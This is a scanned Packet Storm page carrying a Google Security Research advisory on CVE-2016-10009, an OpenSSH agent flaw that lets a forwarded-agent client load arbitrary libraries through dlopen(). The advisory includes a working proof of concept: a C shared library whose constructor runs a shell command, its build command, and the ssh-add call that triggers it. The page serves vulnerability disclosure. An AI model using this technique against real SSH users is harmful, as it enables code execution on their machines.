packetstormsecurity.com
Open in
urlscan Pro
198.84.60.198
Public Scan
Submitted URL: http://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html
Effective URL: https://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html
Submission: On November 27 via api from HU — Scanned from IT
Effective URL: https://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html
Submission: On November 27 via api from HU — Scanned from IT
Form analysis 2 forms found in the DOM
GET /search/
<form method="get" action="/search/"><input type="text" name="q" id="q" maxlength="120" value="Search …"><button type="submit"></button>
<div id="q-tabs"><label for="s-files" class="on">Files</label><label for="s-news">News</label><label for="s-users">Users</label><label for="s-authors">Authors</label><input type="radio" value="files" name="s" id="s-files"><input type="radio"
value="news" name="s" id="s-news"><input type="radio" value="users" name="s" id="s-users"><input type="radio" value="authors" name="s" id="s-authors"></div>
</form>GET /files/cal/
<form id="cal" action="/files/cal/" method="get">
<h2>File Archive:</h2>
<h3>November 2024</h3>
<button id="cal-prev" name="cal-prev" type="button" value="2024-11"><span><</span></button>
<ul class="dotw">
<li>Su</li>
<li>Mo</li>
<li>Tu</li>
<li>We</li>
<li>Th</li>
<li>Fr</li>
<li>Sa</li>
</ul>
<ul>
<li></li>
<li></li>
<li></li>
<li></li>
<li></li>
<li class="med"><a href="/files/date/2024-11-01/">1</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 1st</div>
<div class="count">30 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-02/">2</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 2nd</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-11-03/">3</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 3rd</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-04/">4</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 4th</div>
<div class="count">12 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-05/">5</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 5th</div>
<div class="count">44 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-06/">6</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 6th</div>
<div class="count">18 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-07/">7</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 7th</div>
<div class="count">9 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-08/">8</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 8th</div>
<div class="count">8 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-09/">9</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 9th</div>
<div class="count">3 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-11-10/">10</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 10th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-11/">11</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 11th</div>
<div class="count">14 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-12/">12</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 12th</div>
<div class="count">20 Files</div>
</div>
</li>
<li class="high"><a href="/files/date/2024-11-13/">13</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 13th</div>
<div class="count">63 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-14/">14</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 14th</div>
<div class="count">18 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-15/">15</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 15th</div>
<div class="count">8 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-16/">16</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 16th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-11-17/">17</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 17th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-18/">18</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 18th</div>
<div class="count">18 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-19/">19</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 19th</div>
<div class="count">7 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-20/">20</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 20th</div>
<div class="count">13 Files</div>
</div>
</li>
<li class="low"><a href="/files/date/2024-11-21/">21</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 21st</div>
<div class="count">6 Files</div>
</div>
</li>
<li class="med"><a href="/files/date/2024-11-22/">22</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 22nd</div>
<div class="count">48 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-23/">23</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 23rd</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
<ul>
<li class="none"><a href="/files/date/2024-11-24/">24</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 24th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="high"><a href="/files/date/2024-11-25/">25</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 25th</div>
<div class="count">60 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-26/">26</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 26th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none today"><a href="/files/date/2024-11-27/">27</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 27th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-28/">28</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 28th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-29/">29</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 29th</div>
<div class="count">0 Files</div>
</div>
</li>
<li class="none"><a href="/files/date/2024-11-30/">30</a>
<div class="stats">
<div class="point"></div>
<div class="date">Nov 30th</div>
<div class="count">0 Files</div>
</div>
</li>
</ul>
</form>Text Content
exploit the possibilities
Register | Login
FilesNewsUsersAuthors
Home Files News &[SERVICES_TAB]About Contact Add New
OPENSSH ARBITRARY LIBRARY LOADING
OpenSSH Arbitrary Library Loading Posted Dec 23, 2016 Authored by Jann Horn,
Google Security Research
The OpenSSH agent permits its clients to load PKCS11 providers using the
commands SSH_AGENTC_ADD_SMARTCARD_KEY and
SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the
ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these
commands, the client has to specify a provider name. Th e agent passes this
provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key ->
ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:s end_msg), and
the subprocess receives it and passes it to dlopen() (via ssh-pkcs
11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_ad
d_provider -> dlopen). No checks are performed on the provider name, apart from
testing whether that provider is already loaded. This means that, if a user
connects to a malicious SSH server with agent forwarding enabled and the
malicious server has the ability to place a file with attacker-controlled
contents in the victim's filesystem, the SSH server can execute code on the
user's machine.
tags | exploit advisories | CVE-2016-10009 SHA-256 |
10d0d2808ffc63e1409341e7f4cd4e55ad32bf60b055a0cd27d7b6b8a3fa45ab Download |
Favorite | View
Related Files
SHARE THIS
*
*
* LinkedIn
* Reddit
* Digg
* StumbleUpon
OPENSSH ARBITRARY LIBRARY LOADING
Change Mirror Download
OpenSSH: agent protocol permits loading arbitrary libraries
CVE-2016-10009
The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
To reproduce the issue, first create a library that executes some command when it is loaded:
$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
// prevent recursion through system()
unsetenv("LD_PRELOAD");
unsetenv("LD_LIBRARY_PATH");
system("id > /tmp/test");
}
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
Connect to another machine using "ssh -A". Then, on the remote machine:
$ ssh-add -s [...]/evil_lib.so
Enter passphrase for PKCS#11: [just press enter here]
SSH_AGENT_FAILURE
Could not add card: [...]/evil_lib.so
At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Found by: Jann Horn
Login or Register to add favorites
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed
FILE ARCHIVE:
NOVEMBER 2024
<
* Su
* Mo
* Tu
* We
* Th
* Fr
* Sa
*
*
*
*
*
* 1
Nov 1st
30 Files
* 2
Nov 2nd
0 Files
* 3
Nov 3rd
0 Files
* 4
Nov 4th
12 Files
* 5
Nov 5th
44 Files
* 6
Nov 6th
18 Files
* 7
Nov 7th
9 Files
* 8
Nov 8th
8 Files
* 9
Nov 9th
3 Files
* 10
Nov 10th
0 Files
* 11
Nov 11th
14 Files
* 12
Nov 12th
20 Files
* 13
Nov 13th
63 Files
* 14
Nov 14th
18 Files
* 15
Nov 15th
8 Files
* 16
Nov 16th
0 Files
* 17
Nov 17th
0 Files
* 18
Nov 18th
18 Files
* 19
Nov 19th
7 Files
* 20
Nov 20th
13 Files
* 21
Nov 21st
6 Files
* 22
Nov 22nd
48 Files
* 23
Nov 23rd
0 Files
* 24
Nov 24th
0 Files
* 25
Nov 25th
60 Files
* 26
Nov 26th
0 Files
* 27
Nov 27th
0 Files
* 28
Nov 28th
0 Files
* 29
Nov 29th
0 Files
* 30
Nov 30th
0 Files
TOP AUTHORS IN LAST 30 DAYS
* Red Hat 294 files
* Ubuntu 64 files
* Debian 24 files
* Apple 14 files
* LiquidWorm 12 files
* Gentoo 8 files
* Google Security Research 4 files
* Andrey Stoykov 3 files
* Jann Horn 3 files
* Alter Prime 3 files
FILE TAGS
* ActiveX (933)
* Advisory (87,711)
* Arbitrary (17,209)
* BBS (2,859)
* Bypass (1,937)
* CGI (1,051)
* Code Execution (8,007)
* Conference (693)
* Cracker (845)
* CSRF (3,440)
* DoS (25,539)
* Encryption (2,398)
* Exploit (54,510)
* File Inclusion (4,281)
* File Upload (1,029)
* Firewall (822)
* Info Disclosure (2,942)
* Intrusion Detection (925)
* Java (3,166)
* JavaScript (913)
* Kernel (7,385)
* Local (14,903)
* Magazine (587)
* Overflow (13,298)
* Perl (1,439)
* PHP (5,337)
* Proof of Concept (2,425)
* Protocol (3,761)
* Python (1,695)
* Remote (32,010)
* Root (3,681)
* Rootkit (532)
* Ruby (647)
* Scanner (1,664)
* Security Tool (8,077)
* Shell (3,335)
* Shellcode (1,219)
* Sniffer (906)
* Spoof (2,322)
* SQL Injection (16,754)
* TCP (2,465)
* Trojan (690)
* UDP (921)
* Virus (675)
* Vulnerability (33,324)
* Web (10,197)
* Whitepaper (3,786)
* x86 (973)
* XSS (18,359)
* Other
FILE ARCHIVES
* November 2024
* October 2024
* September 2024
* August 2024
* July 2024
* June 2024
* May 2024
* April 2024
* March 2024
* February 2024
* January 2024
* December 2023
* Older
SYSTEMS
* AIX (430)
* Apple (2,132)
* BSD (378)
* CentOS (61)
* Cisco (1,954)
* Debian (7,171)
* Fedora (1,693)
* FreeBSD (1,247)
* Gentoo (4,607)
* HPUX (881)
* iOS (395)
* iPhone (108)
* IRIX (220)
* Juniper (71)
* Linux (52,070)
* Mac OS X (696)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (490)
* RedHat (17,426)
* Slackware (941)
* Solaris (1,615)
* SUSE (1,444)
* Ubuntu (10,010)
* UNIX (9,482)
* UnixWare (188)
* Windows (6,785)
* Other
© 2024 Packet Storm. All rights reserved.
Site Links News by Month News Tags Files by Month File Tags File Directory
About Us History & Purpose Contact Information Terms of Service Privacy
Statement Copyright Information
Services Security Services Hosting By Rokasec
* Follow us on Twitter
* Follow us on Facebook
* Subscribe to an RSS Feed